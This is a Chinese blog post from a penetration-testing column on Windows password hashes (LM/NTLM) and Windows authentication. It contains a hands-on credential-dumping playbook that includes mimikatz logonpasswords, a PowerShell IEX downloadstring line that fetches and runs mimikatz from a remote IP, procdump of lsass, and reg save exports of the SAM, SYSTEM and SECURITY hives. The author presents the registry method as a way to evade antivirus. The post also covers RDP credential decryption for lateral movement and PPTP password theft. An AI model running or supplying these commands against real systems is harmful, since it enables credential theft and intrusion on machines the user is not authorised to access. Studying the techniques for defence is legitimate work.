WindowsHash简介及windows认证

最新推荐文章于 2024-07-02 10:30:00 发布
最新推荐文章于 2024-07-02 10:30:00 发布
阅读量1.5k 收藏 2
点赞数 1
分类专栏: 内网渗透 文章标签: 哈希算法 散列表 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58000413/article/details/130207552
版权

Windows系统使用两种方法对用户的密码进行哈希处理,他们分别是LAN Manager(LM)哈希和NT LAN Manager(NTML)哈希。

现在已经有了更新的NTLMv2以及Kerberos验证体系。

Windows的系统密码hash默认情况下一般由两个部分组成:第一部分是LM-hash,第二部分是NTLM-hash

windows加密过的密码口令,我们称为hash,windows的系统密码hash默认情况下一般由两个部分组成:第一部分是LM-hash,第二部分NTLM-hash。

WINDOWS系统下hash密码格式:

用户名称:RID:LM-HASH值:NT-HASH值

Windows内网协议学习NTLM篇之NTLM基础介绍-安全客 - 安全资讯平台

可参考以上文章进行详细的学习

Windows的认证包括三个部分:

  • 本地认证:用户直接操作计算机登录账户
  • 网络认证:远程连接到工作组中的某个设备(远程连接ftp,文件共享)
  • 域认证:登录到域环境中的某个设备

Windows本地认证

1、用户输入密码

2、系统收到密码后将用户输入的密码计算成NTLM HASH

3、与sam数据库(%SystemRoot%\System32\config\sam)中该用户对比

4、匹配则登录成功,不匹配则登录失败

NTLM哈希,是一种单向哈希算法,Windows将用户的密码计算成NTLM哈希之后存储在电脑中

本地认证中用来处理用户输入密码的进程位lsass.exe,密码会在这个进程中明文保存,该进程将密码计算成NTLM hash与sam进行对比,们使用mimikatz来获取的明文密码,便是在这个进程中读取到的

Windows密码凭证获取

几种windows本地hash值获取和破解详解 - SecPulse.COM | 安全脉搏

获取凭证工具:

1、Mimikatz

抓取明文密码:

mimikatz # log
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords

使用mimikatz抓取密码

mimikatz.exe "log" "sekurlsa::minidump 1.dmp" "sekurlsa::logonPasswords full" exit

2、Powershell脚本

Powershell远程加载mimikatz脚本

先介绍一下powershell木马最常用的方式,一般都为远程下载然后执行的方法,特点就是:直接内存运行,无文件落地。

https://www.cnblogs.com/chen-w/p/14726549.htmlhttps://www.cnblogs.com/chen-w/p/14726549.html

powershell.exe "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x/a'))”

IEX:指内存运行

new-object  net.webclient:创建一个客户端对象,远程加载mimikatz

3、Ophcrack

我们可以 使用ophcrack工具配合彩虹表自己破解。

4、Procdump+Mimikatz

Procdump下载: https://docs.microsoft.com/zh-cn/sysinternals/downloads/procdump

procdump lsass进程导出

FOR 32bits:procdump.exe -accepteula -ma lsass.exe lsass.dmp
FOR 64bits:procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp

使用mimikatz还原密码:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

5、注册表导出hash

reg save HKLM\SYSTEM SYSTEM.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\SECURITY security.hiv
mimikatz.exe "log" "lsadump::sam /system:system.hiv /sam:sam.hiv" exit

再使用MD5进行查询MD5免费在线解密破解_MD5在线加密-SOMD5

这方法还是比较好的,可以绕过杀毒软件检测。

6、Meterpreter获取hash

7、Cobaltstrike获取hash

hashdump

logonpasswords

mimikatz  sekurlsa::logonpasswords

其他内容:

POWERSHELL脚本获取RDP连接记录

https://github.com/3gstudent/List-RDP-Connections-History

在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密, 解密成功后可使用此凭据继续横向移动。

powershell -exec bypass -f 1.ps1

如果直接运行powershell则会直接报错

本地RDP连接解密

  • 用Mimikatz解密

查看本地机器本地连接过的目标机器:

reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
  • 查看本地用户此目录下是否存有RDP密码文件
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

PPTP口令获取

PPTP:点对点隧道协议,可以使远程用户通过拨入ISP访问企业内网。

在渗透测试中,如果获得了用户的PPTP口令,就能远程拨入内网,做进一步渗透。

需要拿到目标系统管理员权限

参考文章:

【渗透笔记】Windows密码凭证获取 - 灰信网(软件开发博客聚合)

不习惯有你
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NT哈希破解
04-25
初学数据库和密码破解的好工具书,是一本很好的入门级书本,可以看看
Windows获取密码及hash
LuckySec
05-04 3346
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatz 将Mimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
Windows安全认证机制——NTLM本地认证
最新发布
lurenjia404的博客
07-02 555
Windows安全认证机制之NTLM本地认证
windows hash简介
qq_52712762的博客
06-04 979
1、Windows系统使用两种方法对用户的密码进行哈希处理。它们分别是LAN Manager(LM)哈希和NT LAN Manager(NTLM)哈希2、所谓哈希(hash),就是使用一种加密函数进行计算后的结果。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串3、现在已经有了更新的NTLMV2以及Kerberos验证体系4、Windows加密过的密码口令;我们称之为hashwindows的系统密码hash默认情况下一般由两部。
Windows系统散列值获取
weixin_43047908的博客
05-16 1311
目录Windows认证机制单机密码抓取SAM(安全账户管理器)lsass.exe Windows认证机制 Windows下的安全认证机制总共有两种,一种是基于NTLM认证方式,主要用在早期的Windows工作组环境中;另一种是基于Kerberos的认证方式,主要用在域环境中。 在windows中,密码通常由LM HashNTLM Hash组成,结构: username:RID:LM-HASH:NT-HASH LM Hash:使用 DES加密 ,用户密码设置14位以上,即为停用LM Hash。 NTL
windows密码破解(哈希破解技术)
weixin_45511599的博客
10-13 5742
一.windows密码与哈希 1.我们用于登录的windows密码,在windows系统中会进行加密。一般密码加密文件储存在c盘的windows\system32\config目录下,文件名是SAM文件。在system目录下有两个非常重要的文件 A.SAM文件:储存着windows密码,使用LM或者NT算法加密成明文哈希,再由syskey加密成乱码的二次密文 B.SYSTEM文件:密钥文件,有一个程序syskey,对上面的SAM文件进行第一次的解密,解密成明文的哈希值 我们使用反编译技术就可以获得密码 二.
哈希处理介绍-使用Mimikatz以及John对Windows用户密码破解
ran的博客
02-06 6570
Windows系统使用两种算法对用户的密码进行哈希处理, 它们分别是LM-hash算法NTLMhash算法。所谓哈希(hash) , 就是使用一种加密函数对其进行加密。这个加密函数对一个任意长度的字符串数据进行一次数学加密函数运算,然后返回一个固定长度的字符串。Windows的系统密码hash默认情况下一般由两部分组成:第一部分是LM-hash, 第二部分是NTLM-hash。通常可从Windows系统中的SAM文件和域控制器的NTDS.dit文件中获得所有用户的hash
密码学系列——NTHASH以及MD4算法
gzy0506的博客
02-25 8637
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 密码学系列——NTHASH以及MD4算法前言WindowsNTLM-Hash生成原理标准MD4 算法代码片段FPGA实现 前言 主要是为了快速回忆之前工作的一些记录,不至于完全忘记。 WindowsNTLM-Hash生成原理 IBM设计的LM Hash算法存在几个弱点,微软在保持向后兼容性的同时提出了自己的挑战响应机制,NTLM Hash便应运而生。 这里同样以上节的明文密码“123994”作为研究对象。首先在UltraEdit中输入
盘点windows获取hash常见手法~
logic1001的博客
01-24 1286
有师傅反应之前的文章有点太长篇大论 太干,故今日麋鹿换一些风格的文章,写一些简单的,希望能帮到大家,尤其是刚入门的师傅们!适用于Windows 8.1 和 Windows Server 2012 R2 之前Windows 8.1 和 Windows Server 2012 R2 之后,出于安全原因,默认情况下禁用了 WDigest 的明文密码存储可以读到hash所有我们要修改注册表将 UseLogonCredential 设置为 1 然后重启再用猕猴桃就可以获取到密码了。
Qt+Cutelyst学习笔记(二十三)win10+Qt5.15.2 添加认证
aggs1990的专栏
04-07 894
前言: 本篇继续在前一篇的基础上实现 之前的功能实现,都没有考虑认证的问题,本次测试,会增加基本的认证功能,可供读者参考 一、向数据库中添加用户和角色 执行如下语句,向sqlite数据库添加 -- -- Add users and role tables, along with a many-to-many join table -- PRAGMA foreign_keys = ON; CREATE TABLE users ( id INTEGER PRIM
关于windows密码加密算法的说明
企业实战系列集 ●●● https://ximenjianxue.blog.csdn.net
09-13 5052
一、背景 本文的主要介绍Windows创建和存储密码哈希(Hash)的方式,以及这些哈希的破解方式。 我们使用的Windows的计算机使用两种方法对用户密码创建哈希,这两种方法在本质上有着不同的安全意义。这两种方法分别是LAN Manager (LM)以及NT LAN Manager第二版(NTLMv2)。哈希是一种加密算法,通过对加密对象字符串计算得出一个字符串,这种加密需要获取任意大小的字符串数据,并用算法对其进行加密,然后返回一个固定大小的字符串。 其中,早期的LAN Manager哈希是Window
“解密“Windows NTLM Hash
热门推荐
Yale的博客
03-22 1万+
hashcat 3.30开始,在虚拟机中运行hashcat经常会报错,提示GPU错误。这是由于从该版本开始,hashcat对于Intel CPU会自动检测Intel OpenCL运行时,即是否支持GPU破解。如果不支持,就会停止运行。为了便于实验,我们使用2.0版本的hashcat 安装: wget https://hashcat.net/files/hashcat-2.00.7z 7z e h...
3.1 本地认证——NTLM哈希和LM哈希
GloryGod的博客
08-24 306
Windows操作系统中的密码一般由两部分组成,一部分为 LM Hash,另一部分为NTLMHash。首先,用户注销、重启、锁屏后,操作系统会让winlogon.exe显示登陆界面,也就是输入框界面,接收用户的输入信息后,将密码交给lsass进程,这个过程中会存一份明文密码,将明文密码加密成NTLM Hash,对SAM数据库进行比较认证Windows的登陆密码是存储在系统本地的SAM文件中的,在登陆Windows的时候,系统会将用户输入的密码和SAM文件中的密码进行对比,如果相同则认证成功。
Windows系统Hash密码值知识
zero_295813128的专栏
07-17 8715
对入侵者来说,获取Windows的口令是整个攻击过程至关重要的一环,拥有系统原来用户的口令,将使得内网渗 透和守控更加容易。Windows系统中的Hash密码值主要有LM-HASH以及NTLM-HASH值两部分构成,一旦入侵者 获 ... 对入侵者来说,获取Windows的口令是整个攻击过程至关重要的一环,拥有系统原来用户的口令,将使得 内网渗透和守控更加容易。Windows系统中的Has
第15篇:内网横向中windows各端口远程登录哈希传递的方法总结
ABC_123的博客
06-09 3185
Part1 前言随着人们的安全意识的逐步加强,企业内部的Windows服务器口令越来越复杂了,经常会遇到提权到windows服务器,获取了用户的密码hash,但是cmd5官网或者本地猜解都拿不到明文密码的情况。这时候就需要用到内网哈希传递技术了。哈希传递利用了NTLM认证的缺陷,使用用户的密码哈希值来进行NTLM认证。如果目标机器与获取hash值的机器的密码相同,就可......
身份认证攻击
qq_48814526的博客
06-18 516
与dvwa相比,Pikachu的每类漏洞根据不同的情况分别设计了不同的子类,同时,为了让这些漏洞变的有意思一些,在Pikachu平台上为每个漏洞都设计了一些小的场景,点击漏洞页面右上角的"提示"可以查看到帮助信息。此模块的实验,最终结果并没有成功连接到靶机win7,在win7上位于445端口的共享服务也是处于正常运行状态,但从kali进行攻击,比对了几个用户之后,还是不能连接,猜想应该是kali主机内部环境的问题,所以这个实验并没有完全成功,之后我会尝试多种办法,找到原。结果截图并作必要的说明。
QT 5.0.1 windows下编译使用QCA和qca-ossl
mjtfly的专栏
02-04 984
QT 5.0.1 windows下编译使用QCA和qca-ossl   我使用的环境是windows7 x64。   官方的QCA目前版本是2.0.3, 但是是在QT4下编译的,QT5有些方法已经deprecated,所以用QT5编译会报错,我修正了编译不过的地方,具体请查看附件。   编译方法: 1. 设置环境变量(我的QT5.0.1安装在D:\Qt\Qt5.0.1):   Q...
QT学习笔记(一):QT下载、安装、在Windows上搭建开发环境
Newbie_la的博客
02-08 1327
QT学习笔记(一):QT下载、安装、在Windows上搭建开发环境 持续更新
身份证读取设备开发解决方案:1、Windows下开发Qt程序demo读取身份证信息
逍遥游的博客
07-08 1925
身份证读取设备开发解决方案:1、Windows下开发Qt程序demo读取身份证信息 文章目录身份证读取设备开发解决方案:1、Windows下开发Qt程序demo读取身份证信息1. 前言2. 身份证读取模块3. Qt5开发简单上位机读取身份证信息1. 注意的点2. 部分源码3. 结果展示4. 碎片代码4. 问题记录发送指令没有回复读取照片返回-22错误 1. 前言 我们的门禁设备有一个新的需求,需要不但可以刷小区制作的门禁卡,还支持刷身份证进小区,开始时只有一个身份证的认证读取模块,没有开发案例和经验,摸索

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值